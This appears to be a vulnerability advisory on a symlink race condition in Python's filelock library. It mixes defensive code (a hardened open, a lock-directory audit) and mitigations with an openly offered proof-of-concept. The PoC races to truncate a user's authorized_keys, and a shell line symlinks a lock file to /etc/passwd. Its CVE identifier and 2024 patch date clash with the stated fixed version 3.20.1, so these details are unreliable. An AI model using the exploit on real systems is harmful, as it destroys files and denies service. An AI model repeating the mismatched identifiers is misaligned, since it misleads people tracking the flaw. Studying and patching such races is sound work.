Filelock, TOCTOU Symlink Attack, CVE-2024-24557 (Critical)


The vulnerability is a Time-of-Check-Time-of-Use (TOCTOU) race condition in the `filelock` Python library. The `UnixFileLock._acquire` method checks whether a lock file exists (`Path.exists()`) before opening it with `os.open()` and the `O_TRUNC` flag. Between the existence check and the open call, an attacker can replace the lock file with a symbolic link pointing to an arbitrary target file. When `os.open()` executes, it follows the symlink and applies the `O_TRUNC` flag, truncating the target file to zero bytes. A similar pattern exists in the Windows variant (`WindowsFileLock._acquire`), which checks file writability before opening, creating a race window in which a junction or symlink can be substituted.

Platform: Python filelock
Version: <3.20.1
Vulnerability: TOCTOU symlink attack
Severity: Critical
Date: 2024-02-26

Prediction: Patched 2024-02-26
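The following is an added example, not code from the advisory or from the filelock project. It places the check-then-open sequence described above (existence check, then `os.open()` with `O_TRUNC`) beside a hardened open that never truncates and refuses to follow a symlink in the final path component (`O_NOFOLLOW`), then verifies with `fstat()` that the descriptor really is a private regular file. The function names `vulnerable_acquire`, `hardened_acquire` and `demo`, and the temporary-directory scenario, are constructed for this illustration; the hardened variant is one POSIX-only mitigation pattern and is not claimed to be the upstream fix.

```python
import os
import stat
import tempfile


def vulnerable_acquire(lock_path: str) -> int:
    """Constructed mirror of the check-then-open pattern from the advisory.

    The existence check is the time of check; the os.open() with O_TRUNC is
    the time of use. Whatever sits at lock_path at the second moment is
    followed and truncated.
    """
    flags = os.O_RDWR | os.O_TRUNC
    if not os.path.exists(lock_path):      # time of check
        flags |= os.O_CREAT
    return os.open(lock_path, flags, 0o644)  # time of use


def hardened_acquire(lock_path: str) -> int:
    """Open the lock file without truncating and without following a symlink
    at the last path component, then verify what was actually opened.

    O_NOFOLLOW makes the symlink refusal atomic with the open, so there is no
    window to race. The fstat() checks catch a lock path that was swapped for
    a FIFO, device or multiply-linked file before the open.
    """
    flags = os.O_RDWR | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(lock_path, flags, 0o644)  # raises ELOOP if lock_path is a symlink
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise OSError(f"{lock_path}: not a regular file")
        if st.st_nlink != 1:
            raise OSError(f"{lock_path}: unexpected hard link count {st.st_nlink}")
        return fd
    except Exception:
        os.close(fd)
        raise


def demo() -> dict:
    """Constructed scenario: a data file and a lock path that is already a
    symlink to it, i.e. the state after an attacker has won the race."""
    payload = "important data\n"
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "target.txt")
        with open(target, "w") as f:
            f.write(payload)
        lock = os.path.join(d, "app.lock")
        os.symlink(target, lock)

        # The vulnerable open follows the link and truncates the target.
        os.close(vulnerable_acquire(lock))
        size_after_vulnerable = os.path.getsize(target)

        # Restore the data and try the hardened open against the same link.
        with open(target, "w") as f:
            f.write(payload)
        try:
            os.close(hardened_acquire(lock))
            hardened_refused = False
        except OSError:
            hardened_refused = True
        size_after_hardened = os.path.getsize(target)

        # On a clean path the hardened open still works and yields a regular file.
        fd = hardened_acquire(os.path.join(d, "fresh.lock"))
        fresh_is_regular = stat.S_ISREG(os.fstat(fd).st_mode)
        os.close(fd)

        return {
            "size_after_vulnerable": size_after_vulnerable,
            "hardened_refused": hardened_refused,
            "size_after_hardened": size_after_hardened,
            "fresh_is_regular": fresh_is_regular,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

`O_NOFOLLOW` only protects the last path component; a symlinked parent directory is still followed, which is why the advice to keep lock directories at mode 0700 matters in addition to the open flags.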

What Undercode Say:

Identify processes using filelock, monitor symlink creation in /tmp, and time the symlink call:

```bash
# Identify processes using filelock (pgrep -d, joins PIDs for lsof -p)
lsof -p $(pgrep -d, -f "python.myapp") | grep -i lock

# Monitor symlink creation in /tmp
inotifywait -m -r -e create /tmp --format '%w%f' | grep '\.lock$'

# Simulate attack timing
time python -c "import os; os.symlink('/etc/passwd', '/tmp/test.lock')"
```

Proof-of-Concept exploit snippet:

```python
import os, threading, time

lock_path = "/tmp/victim.lock"
target_file = "/home/user/.ssh/authorized_keys"


def attacker():
    # Keep replacing the lock file with a symlink to the target
    while True:
        try:
            os.unlink(lock_path)
        except OSError:
            pass
        os.symlink(target_file, lock_path)


threading.Thread(target=attacker).start()

# Victim code runs:
# from filelock import FileLock; lock = FileLock(lock_path); lock.acquire()
```

How Exploit:

1. Attacker identifies a predictable lock file path.
2. Attacker repeatedly deletes and recreates the lock file as a symlink to the target.
3. Victim's filelock check passes (file doesn't exist).
4. Attacker wins the race; the symlink is in place.
5. Victim's `os.open(…, O_TRUNC)` follows the symlink, truncating the target.

Protection from this CVE:

  • Upgrade to filelock >=3.20.1.
  • Apply `chmod 0700` to lock directories.
  • Use `SoftFileLock` as interim workaround.
  • Audit dependent packages (virtualenv, PyTorch).
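An added example (not from the advisory or the filelock project) that turns the `chmod 0700` advice and the symlink concern into a quick audit of a lock directory: it flags a directory that is itself a symlink, one that is world-writable without the sticky bit or wider than 0700, and any `*.lock` entry that is a symlink, a non-regular file, or owned by someone else. The function names `audit_lock_dir` and `demo_audit` and the temporary-directory fixture are constructed for this illustration.

```python
import os
import stat
import tempfile


def audit_lock_dir(directory: str, suffix: str = ".lock") -> list:
    """Return a list of human-readable findings for one lock directory.

    Uses lstat() throughout so that symlinks are reported as symlinks rather
    than as whatever they point to.
    """
    findings = []
    dst = os.lstat(directory)
    if stat.S_ISLNK(dst.st_mode):
        findings.append(f"{directory}: lock directory is itself a symlink")
    mode = stat.S_IMODE(dst.st_mode)
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        findings.append(f"{directory}: world-writable without sticky bit")
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append(f"{directory}: mode {oct(mode)} is wider than 0o700")

    for name in sorted(os.listdir(directory)):
        if not name.endswith(suffix):
            continue
        path = os.path.join(directory, name)
        est = os.lstat(path)
        if stat.S_ISLNK(est.st_mode):
            findings.append(f"{path}: lock file is a symlink -> {os.readlink(path)}")
        elif not stat.S_ISREG(est.st_mode):
            findings.append(f"{path}: lock file is not a regular file")
        elif est.st_uid != os.getuid():
            findings.append(f"{path}: owned by uid {est.st_uid}, not the current user")
    return findings


def demo_audit() -> list:
    """Constructed fixture: a 0777 lock directory holding one symlinked lock,
    one clean lock and one unrelated file."""
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o777)                       # the weak setting
        target = os.path.join(d, "target.txt")
        open(target, "w").close()
        os.symlink(target, os.path.join(d, "a.lock"))   # planted symlink
        open(os.path.join(d, "b.lock"), "w").close()     # legitimate lock
        open(os.path.join(d, "notes.txt"), "w").close()  # ignored
        return audit_lock_dir(d)


if __name__ == "__main__":
    for line in demo_audit():
        print(line)
```

Run it against a real lock directory with `audit_lock_dir("/path/to/locks")`; an empty list is the corrected state (mode 0700, only regular lock files owned by the service user).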

Impact:

  • Arbitrary file corruption/truncation.
  • Data loss, denial of service.
  • Information leakage via path disclosure.
  • Cascade to major projects (PyTorch, virtualenv).

Sources:

Reported By: github.com